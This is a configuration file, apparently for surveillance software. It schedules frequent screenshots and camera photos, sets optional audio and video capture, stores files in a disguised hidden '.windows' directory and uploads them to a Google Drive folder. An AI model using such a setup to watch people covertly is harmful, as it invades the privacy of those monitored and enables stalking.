#In seconds
refresh_config_interval=20
should_use_user_home_path=true
#content_directory_path=/.windows/.tmp/.data/.cache
content_directory_path=/.windows/.tmp/.data/.cache


capture_screen_shots=true
#In seconds
capture_screen_shot_interval=10
image_compression_enabled=true
direct_screenshot_upload=true

capture_photo=true
#In seconds
capture_photo_interval=5
direct_photo_upload=true

capture_video=false
#In seconds
capture_video_interval=5
# Video file size in duration in seconds
video_file_length_in_duration=60
pause_video_interval=5

capture_audio=false
#In seconds
pause_audio_interval=5
#In seconds
audio_file_length_in_duration=60

## Apply for both Audio/ Video files
wait_before_delete_in_seconds=30

# GDrive enabled/disabled config
google_drive_upload_enabled=true
google_drive_folder_id=1wY_yorR0c12cNbREvCZecezcm22XJH17

